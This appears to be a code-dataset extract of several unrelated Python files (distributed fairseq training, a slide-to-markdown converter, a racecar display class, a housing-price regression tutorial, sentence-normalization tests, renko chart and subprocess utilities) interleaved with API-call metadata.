    assert src_dict.pad() == tgt_dict.pad() == 1
    assert src_dict.eos() == tgt_dict.eos() == 2
    assert src_dict.unk() == tgt_dict.unk() == 3
    # BUG FIX: log the actual dictionary names passed in rather than the
    # hard-coded 'source'/'target' labels (identical for the defaults).
    logger.info('[{}] dictionary: {} types'.format(src_dict_name, len(src_dict)))
    logger.info('[{}] dictionary: {} types'.format(tgt_dict_name, len(tgt_dict)))
    return src_dict, tgt_dict
def main(rank, args, world_size):
    """Per-process DDP training entry point (spawned once per GPU).

    Args:
        rank: this process's distributed rank (== GPU index under mp.spawn)
        args: parsed command-line arguments
        world_size: total number of processes / GPUs
    """
    if rank == 0:
        logger.info(vars(args))
    # create task & load source and taget dictionary
    # translation_task = TranslationTask.setup_task(args)
    logger.info(f"Running DDP on rank {rank}.")
    setup(rank, world_size)
    # build trainer
    logger.info('- build trainer (rank {})...'.format(rank))
    trainer = Trainer(args, logger, rank)
    # NOTE(review): tgt_dict is not used below — only src_dict feeds the datasets.
    src_dict, tgt_dict = trainer.get_dicts()
    # create datasets
    logger.info('- loading training set (rank {})...'.format(rank))
    train_dataset = FairseqDataset(src_dict, args.train_source, args.train_target,
                                  max_positions=args.max_positions, no_bos=args.no_bos)
    logger.info('- loading development set (rank {})...'.format(rank))
    dev_dataset = FairseqDataset(src_dict, args.dev_source, args.dev_target,
                                max_positions=args.max_positions, no_bos=False)
    torch.distributed.barrier() # make sure all datasets are loaded
    def collate_fn(samples):
        """Pad and batch a list of samples using fairseq's collate helper.

        Args:
            samples: list of samples
        """
        return collate(samples, train_dataset.pad_idx, train_dataset.eos_idx,
                       left_pad_source=True,
                       left_pad_target=False,
                       input_feeding=True)
    # DistributedSampler shards the data across ranks and handles shuffling.
    train_sampler = DistributedSampler(train_dataset, num_replicas=world_size, rank=rank, shuffle=True)
    train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, sampler=train_sampler,
                                  collate_fn=collate_fn, pin_memory=True)
    # train model
    trainer.train(train_dataloader, train_sampler, dev_dataset, None)
    # finish process
    cleanup()
if __name__ == "__main__":
    parser = init_arg_parser()
    # TranslationTask.add_args(parser)
    args = parser.parse_args()
    # main(args)
    # Spawn one training process per visible GPU; mp.spawn passes each
    # process its rank as the first positional argument to main().
    n_gpus = torch.cuda.device_count()
    mp.spawn(main,
             args=(args, n_gpus),
             nprocs=n_gpus,
             join=True)
"logging.basicConfig",
"logging.getLogger",
"torch.distributed.barrier",
"torch.distributed.destroy_process_group",
"torch.multiprocessing.spawn",
"modules.trainer.Trainer",
"modules.utils.init_arg_parser",
"fairseq.data.language_pair_dataset.collate",
"torch.cuda.device_count",
"modules.data_util... | [((525, 685), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s | %(levelname)s | %(name)s | %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""', 'level': 'logging.INFO', 'stream': 'sys.stdout'}), "(format=\n '%(asctime)s | %(levelname)s | %(name)s | %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S', level=logging.INFO, stream=sys.stdout)\n", (544, 685), False, 'import logging\n'), ((704, 738), 'logging.getLogger', 'logging.getLogger', (['"""fairseq.train"""'], {}), "('fairseq.train')\n", (721, 738), False, 'import logging\n'), ((760, 788), 'torch.distributed.destroy_process_group', 'dist.destroy_process_group', ([], {}), '()\n', (786, 788), True, 'import torch.distributed as dist\n'), ((944, 1009), 'torch.distributed.init_process_group', 'dist.init_process_group', (['"""nccl"""'], {'rank': 'rank', 'world_size': 'world_size'}), "('nccl', rank=rank, world_size=world_size)\n", (967, 1009), True, 'import torch.distributed as dist\n'), ((2145, 2172), 'modules.trainer.Trainer', 'Trainer', (['args', 'logger', 'rank'], {}), '(args, logger, rank)\n', (2152, 2172), False, 'from modules.trainer import Trainer\n'), ((2330, 2450), 'modules.data_utils.FairseqDataset', 'FairseqDataset', (['src_dict', 'args.train_source', 'args.train_target'], {'max_positions': 'args.max_positions', 'no_bos': 'args.no_bos'}), '(src_dict, args.train_source, args.train_target,\n max_positions=args.max_positions, no_bos=args.no_bos)\n', (2344, 2450), False, 'from modules.data_utils import FairseqDataset\n'), ((2576, 2687), 'modules.data_utils.FairseqDataset', 'FairseqDataset', (['src_dict', 'args.dev_source', 'args.dev_target'], {'max_positions': 'args.max_positions', 'no_bos': '(False)'}), '(src_dict, args.dev_source, args.dev_target, max_positions=\n args.max_positions, no_bos=False)\n', (2590, 2687), False, 'from modules.data_utils import FairseqDataset\n'), ((2721, 2748), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', 
(2746, 2748), False, 'import torch\n'), ((3124, 3211), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['train_dataset'], {'num_replicas': 'world_size', 'rank': 'rank', 'shuffle': '(True)'}), '(train_dataset, num_replicas=world_size, rank=rank,\n shuffle=True)\n', (3142, 3211), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3231, 3351), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'sampler': 'train_sampler', 'collate_fn': 'collate_fn', 'pin_memory': '(True)'}), '(train_dataset, batch_size=args.batch_size, sampler=train_sampler,\n collate_fn=collate_fn, pin_memory=True)\n', (3241, 3351), False, 'from torch.utils.data import Dataset, DataLoader, BatchSampler\n'), ((3550, 3567), 'modules.utils.init_arg_parser', 'init_arg_parser', ([], {}), '()\n', (3565, 3567), False, 'from modules.utils import init_arg_parser\n'), ((3670, 3695), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (3693, 3695), False, 'import torch\n'), ((3700, 3761), 'torch.multiprocessing.spawn', 'mp.spawn', (['main'], {'args': '(args, n_gpus)', 'nprocs': 'n_gpus', 'join': '(True)'}), '(main, args=(args, n_gpus), nprocs=n_gpus, join=True)\n', (3708, 3761), True, 'import torch.multiprocessing as mp\n'), ((2905, 3036), 'fairseq.data.language_pair_dataset.collate', 'collate', (['samples', 'train_dataset.pad_idx', 'train_dataset.eos_idx'], {'left_pad_source': '(True)', 'left_pad_target': '(False)', 'input_feeding': '(True)'}), '(samples, train_dataset.pad_idx, train_dataset.eos_idx,\n left_pad_source=True, left_pad_target=False, input_feeding=True)\n', (2912, 3036), False, 'from fairseq.data.language_pair_dataset import collate\n')] |
#!/usr/bin/env python3
"""
intermediate yaml to markdown conversion
"""
import sys
import yaml
def yaml_to_markdown(yaml, outfile):
    """Render every slide dict in *yaml* (a list loaded from a YAML file)
    as markdown on the file-like object *outfile*.

    Note: the parameter name shadows the yaml module; here it is the parsed
    document (a list of slide dicts), not the module.
    """
    for slide_dict in yaml:
        slide_to_markdown(slide_dict, outfile)
def get_title(slide):
    """Return the slide's title string, or None if it has no title shape.

    Side effect: the title shape is removed from slide["conts"] so the
    remaining shapes can be rendered as body content.  Newlines inside the
    title are replaced with spaces.
    """
    shapes = slide["conts"]
    for i, shape in enumerate(shapes):
        if shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
            del shapes[i]
            return shape["String"].replace("\n", " ")
    # Bug fix: previously a slide without a title shape raised NameError
    # (``title`` was never bound); return None as the docstring promises.
    return None
def slide_to_markdown(slide, outfile):
    """Render one slide dict as a markdown section on *outfile*.

    The slide title becomes an H3 heading (falling back to "SLIDE"); each
    remaining shape is rendered according to its ShapeType.
    """
    shapes = slide["conts"]
    title = get_title(slide)
    if not title:
        title = "SLIDE"
    print("### " + title + "\n", file=outfile)
    for shape in shapes:
        if shape["ShapeType"] == "com.sun.star.drawing.GraphicObjectShape":
            add_graphic(shape, outfile)
        # all Groups should've been converted to SVG
        elif shape["ShapeType"] == "com.sun.star.drawing.GroupShape":
            print("grouping ...\nslide title: ", title)
            add_graphic(shape, outfile)
        elif shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
            # NOTE(review): this branch matches TitleTextShape but emits a
            # TABLE placeholder -- the intended ShapeType was presumably a
            # table shape; confirm against the upstream YAML exporter.
            out_str = "(TABLE not converted from PowerPoint)"
            print(out_str + "\n", file=outfile)
        elif "elements" in shape:
            add_list(shape, outfile)
        elif "String" in shape and shape["String"]:
            add_text(shape, outfile)
        else:
            # Leave an HTML-comment breadcrumb for shapes we cannot convert.
            out_str = "<!-- sl: %(slideNum)s, shp: %(shapeNum)s, type: %(shapeType)s !-->" % {
                "slideNum" : slide["slideNum"],
                "shapeNum" : shape["shapeNum"],
                "shapeType" : shape["ShapeType"] }
            print(out_str + "\n", file=outfile)
def add_text(shape, outfile):
    """Write the shape's text content to *outfile* as a markdown paragraph
    (stripped of surrounding whitespace, followed by a blank line)."""
    text = shape["String"].strip()
    print(text + "\n", file=outfile)
def add_list(shape, outfile):
    """
    Given a shape that represents an 'Outline' --
    OpenOffice's representation of a bulleted or numbered
    list -- attempt to convert the elements into
    a sensible Markdown list, and write to
    "outfile".
    """
    els = shape["elements"]
    indent = 0
    def item_to_str(item):
        # 4 spaces of indentation per nesting level; reads ``indent`` from
        # the enclosing scope, so it must be called at the right moment.
        s = (' ' * indent * 4) + "- " + item["String"].strip()
        return s
    # handle first item
    output = [item_to_str(els[0])]
    def dump_output():
        print( "\n".join(output) + "\n", file=outfile)
    if len(els) == 1:
        dump_output()
        return
    # handle rest of items
    last_el = els[0]
    for el in els[1:]:
        # int-ify the level if None
        if el["NumberingLevel"] is None:
            el["NumberingLevel"] = 0
        if last_el["NumberingLevel"] is None:
            last_el["NumberingLevel"] = 0
        # new indent
        # Indent is tracked relatively, one step per level change, so a jump
        # of several NumberingLevels collapses into a single indent step.
        if el["NumberingLevel"] > last_el["NumberingLevel"]:
            indent += 1
        elif el["NumberingLevel"] < last_el["NumberingLevel"]:
            indent = max(0, indent-1)
        else:
            pass
        #print("  new indent:", indent)
        # Skip empty / single-character items.
        if len(el["String"]) > 1:
            output.append(item_to_str(el))
        last_el = el
    dump_output()
def add_graphic(shape, outfile):
    """
    Given a Shape representing some graphics object
    (e.g. jpg, png, MetaFile, SVG), write out
    the markdown to show it on "outfile".

    Prefers the exported SVG over the raster export when both exist; the
    shape's own text (if any) becomes the image's alt text.
    """
    if "String" in shape and shape["String"]:
        alt_text = shape["String"]
    else:
        alt_text = ""
    if "exported_svg_filename" in shape:
        filename = shape["exported_svg_filename"]
    else:
        filename = shape["exported_filename"]
    # Bug fix: the link template had been truncated to "s)", which printed a
    # literal "s)" instead of a markdown image reference.
    link = "![%(alt_text)s](%(filename)s)" % { "alt_text" : alt_text,
                                               "filename" : filename }
    print(link + "\n", file=outfile)
# typical image types:
# image/jpeg, image/png, image/gif
# text shapes:
# TextShape, NotesShape, SubtitleShape, OutlinerShape,
# TitleTextShape, ?CustomShape, possibly ?RectangleShape
def convert_file(input_file, output_file):
    """Load the intermediate YAML in *input_file* and write the converted
    markdown to *output_file*."""
    with open(input_file, "r") as reader:
        slides = yaml.load(reader, Loader=yaml.SafeLoader)
    with open(output_file, "w") as writer:
        yaml_to_markdown(slides, writer)
MAIN="__main__"
#MAIN=None
def main():
    """Command-line entry point: pptx-to-md.py INPUT_FILE OUTPUT_FILE."""
    cli_args = sys.argv[1:]
    if len(cli_args) != 2:
        print("usage: pptx-to-md.py INPUT_FILE OUTPUT_FILE")
        sys.exit(1)
    input_file, output_file = cli_args
    convert_file(input_file, output_file)
if __name__ == MAIN:
    main()
| [
"yaml.load",
"sys.exit"
] | [((4159, 4199), 'yaml.load', 'yaml.load', (['input'], {'Loader': 'yaml.SafeLoader'}), '(input, Loader=yaml.SafeLoader)\n', (4168, 4199), False, 'import yaml\n'), ((4436, 4447), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4444, 4447), False, 'import sys\n')] |
"""
Copyright <NAME> College
MIT License
Spring 2020
Contains the Display module of the racecar_core library
"""
import cv2 as cv
import os
from nptyping import NDArray
from display import Display
class DisplayReal(Display):
    """Concrete Display that shows images in an OpenCV window on X display :1."""

    __WINDOW_NAME: str = "RACECAR display window"
    __DISPLAY: str = ":1"

    def __init__(self):
        # List the X sockets under /tmp/.X11-unix to see whether :1 exists.
        available = os.popen(
            "cd /tmp/.X11-unix && for x in X*; do echo \":${x#X}\"; done "
        ).read()
        self.__display_found = self.__DISPLAY in available
        if self.__display_found:
            os.environ["DISPLAY"] = self.__DISPLAY
        else:
            print(f"Display {self.__DISPLAY} not found.")

    def create_window(self) -> None:
        # Without a display, window operations are silently skipped.
        if not self.__display_found:
            return
        cv.namedWindow(self.__WINDOW_NAME)

    def show_color_image(self, image: NDArray) -> None:
        if not self.__display_found:
            return
        cv.imshow(self.__WINDOW_NAME, image)
        cv.waitKey(1)
| [
"os.popen",
"cv2.waitKey",
"cv2.namedWindow",
"cv2.imshow"
] | [((765, 799), 'cv2.namedWindow', 'cv.namedWindow', (['self.__WINDOW_NAME'], {}), '(self.__WINDOW_NAME)\n', (779, 799), True, 'import cv2 as cv\n'), ((933, 969), 'cv2.imshow', 'cv.imshow', (['self.__WINDOW_NAME', 'image'], {}), '(self.__WINDOW_NAME, image)\n', (942, 969), True, 'import cv2 as cv\n'), ((982, 995), 'cv2.waitKey', 'cv.waitKey', (['(1)'], {}), '(1)\n', (992, 995), True, 'import cv2 as cv\n'), ((406, 476), 'os.popen', 'os.popen', (['"""cd /tmp/.X11-unix && for x in X*; do echo ":${x#X}"; done """'], {}), '(\'cd /tmp/.X11-unix && for x in X*; do echo ":${x#X}"; done \')\n', (414, 476), False, 'import os\n')] |
import pandas as pd
# Load the Melbourne housing data from the working directory.
melbourne_file_path = './melbourne_housing_data.csv'
melbourne_data = pd.read_csv(melbourne_file_path)
# Bug fix: dropna() returns a *new* DataFrame; the original call discarded
# the result, so rows with missing values were silently kept.
melbourne_data = melbourne_data.dropna(axis=0)
# Prediction target (house price) and the feature matrix.
y = melbourne_data.Price
melbourne_features = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']
X = melbourne_data[melbourne_features]
X.describe()
X.head(n=10)
from sklearn.tree import DecisionTreeRegressor
# random_state is fixed so the fitted tree is reproducible between runs.
melbourne_model = DecisionTreeRegressor(random_state=1)
#Fit model
melbourne_model.fit(X,y)
#Make predictions for first five rows
#print(X.head())
#Predictions
#print(melbourne_model.predict(X.head()))
#What is Model Validation
#You'll want to evaluate almost every model you ever build. In most (though not all) applications, the relevant measure of model quality is predictive accuracy. In other words, will the model's predictions be close to what actually happens.
#
#Many people make a huge mistake when measuring predictive accuracy. They make predictions with their training data and compare those predictions to the target values in the training data. You'll see the problem with this approach and how to solve it in a moment, but let's think about how we'd do this first.
#
#You'd first need to summarize the model quality into an understandable way. If you compare predicted and actual home values for 10,000 houses, you'll likely find mix of good and bad predictions. Looking through a list of 10,000 predicted and actual values would be pointless. We need to summarize this into a single metric.
#
#There are many metrics for summarizing model quality, but we'll start with one called Mean Absolute Error (also called MAE). Let's break down this metric starting with the last word, error.
from sklearn.metrics import mean_absolute_error
predicted_home_prices = melbourne_model.predict(X)
# "In-sample" MAE: scored on the same rows used for training (see the
# discussion above), so it underestimates the true error.
mean_absolute_error(y,predicted_home_prices)
#The Problem with "In-Sample" Scores
#The measure we just computed can be called an "in-sample" score. We used a single "sample" of houses for both building the model and evaluating it. Here's why this is bad.
#
#Imagine that, in the large real estate market, door color is unrelated to home price.
#
#However, in the sample of data you used to build the model, all homes with green doors were very expensive. The model's job is to find patterns that predict home prices, so it will see this pattern, and it will always predict high prices for homes with green doors.
#
#Since this pattern was derived from the training data, the model will appear accurate in the training data.
#
#But if this pattern doesn't hold when the model sees new data, the model would be very inaccurate when used in practice.
#
#Since models' practical value come from making predictions on new data, we measure performance on data that wasn't used to build the model. The most straightforward way to do this is to exclude some data from the model-building process, and then use those to test the model's accuracy on data it hasn't seen before. This data is called validation data.
from sklearn.model_selection import train_test_split
# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
# the random_state argument guarantees we get the same split every time we
# run this script.
train_X,test_X,train_y,test_y = train_test_split(X,y,random_state=0)
#Define the model
melbourne_model = DecisionTreeRegressor()
#Fit the model
melbourne_model.fit(train_X,train_y)
# get predicted prices on validation data
test_predictions = melbourne_model.predict(test_X)
# Out-of-sample MAE on held-out validation data -- the honest quality metric.
mean_absolute_error(test_y,test_predictions)
| [
"sklearn.model_selection.train_test_split",
"sklearn.metrics.mean_absolute_error",
"sklearn.tree.DecisionTreeRegressor",
"pandas.read_csv"
] | [((92, 124), 'pandas.read_csv', 'pd.read_csv', (['melbourne_file_path'], {}), '(melbourne_file_path)\n', (103, 124), True, 'import pandas as pd\n'), ((396, 433), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {'random_state': '(1)'}), '(random_state=1)\n', (417, 433), False, 'from sklearn.tree import DecisionTreeRegressor\n'), ((1787, 1832), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['y', 'predicted_home_prices'], {}), '(y, predicted_home_prices)\n', (1806, 1832), False, 'from sklearn.metrics import mean_absolute_error\n'), ((3333, 3371), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'random_state': '(0)'}), '(X, y, random_state=0)\n', (3349, 3371), False, 'from sklearn.model_selection import train_test_split\n'), ((3408, 3431), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {}), '()\n', (3429, 3431), False, 'from sklearn.tree import DecisionTreeRegressor\n'), ((3581, 3626), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['test_y', 'test_predictions'], {}), '(test_y, test_predictions)\n', (3600, 3626), False, 'from sklearn.metrics import mean_absolute_error\n')] |
import unittest
from textwrap import dedent
from normalize_sentences import normalize_sentences
class NormalizeSentencesTests(unittest.TestCase):
    """Tests for normalize_sentences."""
    maxDiff = 1000
    def test_no_sentences(self):
        # Text with no terminal punctuation should pass through unchanged.
        sentence = "This isn't a sentence"
        self.assertEqual(normalize_sentences(sentence), sentence)
    def test_one_sentence(self):
        sentence = "This is a sentence."
        self.assertEqual(normalize_sentences(sentence), sentence)
    def test_two_sentences(self):
        sentences = ["Sentence 1.", "Sentence 2."]
        self.assertEqual(
            normalize_sentences(" ".join(sentences)),
            " ".join(sentences),
        )
    def test_multiple_punctuation_marks(self):
        # '!', '?' and '.' must all be treated as sentence terminators.
        sentences = ["Sentence 1!", "Sentence 2?", "Sentence 3."]
        self.assertEqual(
            normalize_sentences(" ".join(sentences)),
            " ".join(sentences),
        )
    def test_multiple_paragraphs(self):
        # Paragraph breaks (blank lines) must survive normalization.
        sentences = dedent("""
            This is a paragraph. With two sentences in it.
            And this is one. With three. Three short sentences.
        """).strip()
        expected = dedent("""
            This is a paragraph. With two sentences in it.
            And this is one. With three. Three short sentences.
        """).strip()
        self.assertEqual(
            normalize_sentences(sentences),
            expected,
        )
    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_no_extra_spaces(self):
        sentences = """
            Sentence 1. And two spaces after. But one space after this.
        """
        expected = """
            Sentence 1. And two spaces after. But one space after this.
        """
        self.assertEqual(
            normalize_sentences(sentences),
            expected,
        )
    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_with_abbreviations_and_numbers(self):
        # Abbreviations and decimal numbers must not be treated as sentence ends.
        sentences = "P.S. I like fish (e.g. salmon). That is all."
        expected = "P.S. I like fish (e.g. salmon). That is all."
        self.assertEqual(
            normalize_sentences(sentences),
            expected,
        )
        sentences = "I ate 5.5 oranges. They cost $.50 each. They were good."
        expected = "I ate 5.5 oranges. They cost $.50 each. They were good."
        self.assertEqual(
            normalize_sentences(sentences),
            expected,
        )
    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_excluded_words_work(self):
        sentences = (
            "Do you know about the work of Dr. <NAME>? You can "
            "find out what she did by using google.com. Google is used by "
            "1.17 billion people (as of December 2012). That's a lot people!"
        )
        expected = (
            "Do you know about the work of Dr. <NAME>? You can "
            "find out what she did by using google.com. Google is used by "
            "1.17 billion people (as of December 2012). That's a lot people!"
        )
        self.assertEqual(
            normalize_sentences(sentences),
            expected,
        )
if __name__ == "__main__":
    unittest.main(verbosity=2)
| [
"unittest.main",
"textwrap.dedent",
"normalize_sentences.normalize_sentences"
] | [((3354, 3380), 'unittest.main', 'unittest.main', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (3367, 3380), False, 'import unittest\n'), ((313, 342), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentence'], {}), '(sentence)\n', (332, 342), False, 'from normalize_sentences import normalize_sentences\n'), ((454, 483), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentence'], {}), '(sentence)\n', (473, 483), False, 'from normalize_sentences import normalize_sentences\n'), ((1376, 1406), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (1395, 1406), False, 'from normalize_sentences import normalize_sentences\n'), ((1843, 1873), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (1862, 1873), False, 'from normalize_sentences import normalize_sentences\n'), ((2241, 2271), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (2260, 2271), False, 'from normalize_sentences import normalize_sentences\n'), ((2500, 2530), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (2519, 2530), False, 'from normalize_sentences import normalize_sentences\n'), ((3257, 3287), 'normalize_sentences.normalize_sentences', 'normalize_sentences', (['sentences'], {}), '(sentences)\n', (3276, 3287), False, 'from normalize_sentences import normalize_sentences\n'), ((1004, 1161), 'textwrap.dedent', 'dedent', (['"""\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """'], {}), '(\n """\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """\n )\n', (1010, 1161), False, 'from textwrap import dedent\n'), ((1179, 1339), 'textwrap.dedent', 'dedent', (['"""\n This is a paragraph. With two sentences in it.\n\n And this is one. 
With three. Three short sentences.\n """'], {}), '(\n """\n This is a paragraph. With two sentences in it.\n\n And this is one. With three. Three short sentences.\n """\n )\n', (1185, 1339), False, 'from textwrap import dedent\n')] |
import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
    """Convert OHLC candle data in *df* into renko-brick rows.

    The brick size comes from atrlib.brick_size(df).  A new brick is emitted
    only when the close moves a full brick beyond the previous brick; the
    volume accumulated since the last brick is attached to the new one.
    Returns a DataFrame with date/open/close/low/high/volume columns.
    """
    # d/l/h: brick date, low, high; lbo/lbc: brick open/close; vol: per-brick volume
    d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
    brick_size = atrlib.brick_size(df)
    volume = 0.0
    for i in range(0,len(df)):
        if i==0:
            # Seed the first brick directly from the first candle.
            if(df['close'][i]>df['open'][i]):
                d.append(df['date'][i])
                l.append(df['open'][i])
                h.append(df["close"][i])
                lbo.append(df["open"][i])
                lbc.append(df["close"][i])
                vol.append(df['volume'][i])
            else:
                d.append(df['date'][i])
                l.append(df['close'][i])
                h.append(df["open"][i])
                lbo.append(df["open"][i])
                lbc.append(df["close"][i])
                vol.append(df['volume'][i])
        else:
            volume += df["volume"][i]
            leng = len(lbo)
            if(lbc[leng-1]>lbo[leng-1]):
                # Last brick was an up-brick: continue up from its close, or
                # reverse down from its open.
                if(df["close"][i]>=(lbc[leng-1]+brick_size)):
                    lbc.append((lbc[leng-1]+brick_size))
                    lbo.append(lbc[leng-1])
                    l.append(lbc[leng-1])
                    h.append((lbc[leng-1]+brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
                elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
                    lbc.append((lbo[leng-1]-brick_size))
                    lbo.append(lbo[leng-1])
                    h.append(lbo[leng-1])
                    l.append((lbo[leng-1]-brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
            else:
                # Last brick was a down-brick: reverse up from its open, or
                # continue down from its close.
                if(df["close"][i]>=(lbo[leng-1]+brick_size)):
                    lbc.append((lbo[leng-1]+brick_size))
                    lbo.append(lbo[leng-1])
                    l.append(lbo[leng-1])
                    h.append((lbo[leng-1]+brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
                elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
                    lbc.append((lbc[leng-1]-brick_size))
                    lbo.append(lbc[leng-1])
                    h.append(lbc[leng-1])
                    l.append((lbc[leng-1]-brick_size))
                    d.append(df["date"][i])
                    vol.append(volume)
                    volume = 0.0
    data_ = pd.DataFrame(d,columns=["date"])
    data_["open"] = lbo
    data_["close"] =lbc
    data_["low"] = l
    data_["high"] = h
    data_['volume']=vol
    return data_
| [
"pandas.DataFrame",
"atrlib.brick_size"
] | [((162, 183), 'atrlib.brick_size', 'atrlib.brick_size', (['df'], {}), '(df)\n', (179, 183), False, 'import atrlib\n'), ((2506, 2539), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {'columns': "['date']"}), "(d, columns=['date'])\n", (2518, 2539), True, 'import pandas as pd\n')] |
import os
import pathlib
import requests
import shutil
import subprocess
import time
ENV_PATHS = set()
# Directories registered here are appended to PATH for every run_command call.


def add_path_to_env(path):
    """Register *path* so it is appended to PATH when running commands."""
    ENV_PATHS.add(path)


def run_command(command, timeout=-1):
    """Run *command* (a string or an argv list) and return its decoded stdout.

    The child's PATH is extended with every path registered through
    add_path_to_env.  A non-positive *timeout* means "wait forever".

    Raises:
        TimeoutError: the command did not finish within *timeout* seconds.
        RuntimeError: the command wrote to stderr or exited non-zero.
    """
    if isinstance(command, str):
        command = command.split(' ')
    my_env = os.environ.copy()
    my_env["PATH"] += ":" + ":".join(ENV_PATHS)
    try:
        if timeout > 0:
            completed_process = subprocess.run(
                command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                env=my_env, timeout=timeout)
        else:
            completed_process = subprocess.run(
                command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                env=my_env)
    except subprocess.TimeoutExpired:
        raise TimeoutError(f"command {' '.join(command)} timeout")
    if completed_process.stderr != b'':
        error_info = completed_process.stderr.decode()
        raise RuntimeError(f"during execution: {' '.join(command)} exception occurred\n{error_info}")
    # Bug fix: a command failing with a non-zero exit status but writing
    # nothing to stderr used to be reported as a success.
    if completed_process.returncode != 0:
        raise RuntimeError(
            f"during execution: {' '.join(command)} exited with code {completed_process.returncode}")
    return completed_process.stdout.decode('utf-8')
def search_files_in_paths(paths: list, pattern: str):
    """Collect files whose names end in *pattern* from a mix of files and
    directories.

    Directories are searched recursively; explicit file paths are kept only
    if they match *pattern*.  Missing or mismatched paths are reported on
    stdout and skipped.
    """
    matches = []
    for candidate in paths:
        if not candidate.exists():
            print(f"Unable to locate {candidate}.")
        elif candidate.is_dir():
            matches.extend(candidate.glob("**/*" + pattern))
        elif candidate.name.endswith(pattern):
            matches.append(candidate)
        else:
            print(f"{candidate} is not an {pattern} file which is excepted format.")
    return matches
def download_file(url, path):
    """Stream the resource at *url* into the local file *path*."""
    with requests.get(url, stream=True) as response:
        with open(path, 'wb') as out:
            shutil.copyfileobj(response.raw, out)
def chunks(lst, n):
    """Split *lst* into *n* interleaved sublists (round-robin by index),
    so element i lands in sublist i % n."""
    if n == 1:
        return [lst]
    return [lst[start::n] for start in range(n)]
def create_unix_timestamp_folder(parent_path):
    """Create and return a sub-folder of *parent_path* named after the
    current unix timestamp, retrying once per second until the name is free."""
    base = pathlib.Path(parent_path)
    candidate = base / str(time.time())
    while candidate.exists():
        time.sleep(1)
        candidate = base / str(time.time())
    candidate.mkdir(parents=True)
    return candidate
def merge_files_binary(file_paths: list, output_path: pathlib.Path):
    """Concatenate the given files byte-for-byte into *output_path*,
    in the order they are listed."""
    with open(output_path, 'wb') as sink:
        for piece in file_paths:
            with open(piece, 'rb') as source:
                shutil.copyfileobj(source, sink)
def parse_input_paths(input_list, project_name, parent_directory):
    """Resolve user-supplied input paths against *parent_directory*.

    When *input_list* is None the default project folder
    (parent_directory / project_name) is returned; otherwise relative
    entries are anchored at *parent_directory* and absolute ones kept as-is.
    """
    if input_list is None:
        return [pathlib.Path(parent_directory / project_name)]
    resolved = []
    for raw in input_list:
        candidate = pathlib.Path(raw)
        if candidate.is_absolute():
            resolved.append(candidate)
        else:
            resolved.append(parent_directory / candidate)
    return resolved
| [
"shutil.copyfileobj",
"pathlib.Path",
"subprocess.run",
"requests.get",
"time.sleep",
"os.environ.copy",
"time.time"
] | [((282, 299), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (297, 299), False, 'import os\n'), ((1880, 1905), 'pathlib.Path', 'pathlib.Path', (['parent_path'], {}), '(parent_path)\n', (1892, 1905), False, 'import pathlib\n'), ((1551, 1581), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (1563, 1581), False, 'import requests\n'), ((1922, 1933), 'time.time', 'time.time', ([], {}), '()\n', (1931, 1933), False, 'import time\n'), ((2001, 2014), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2011, 2014), False, 'import time\n'), ((417, 522), 'subprocess.run', 'subprocess.run', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'my_env', 'timeout': 'timeout'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env\n =my_env, timeout=timeout)\n', (431, 522), False, 'import subprocess\n'), ((564, 652), 'subprocess.run', 'subprocess.run', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'env': 'my_env'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env\n =my_env)\n', (578, 652), False, 'import subprocess\n'), ((1636, 1664), 'shutil.copyfileobj', 'shutil.copyfileobj', (['r.raw', 'f'], {}), 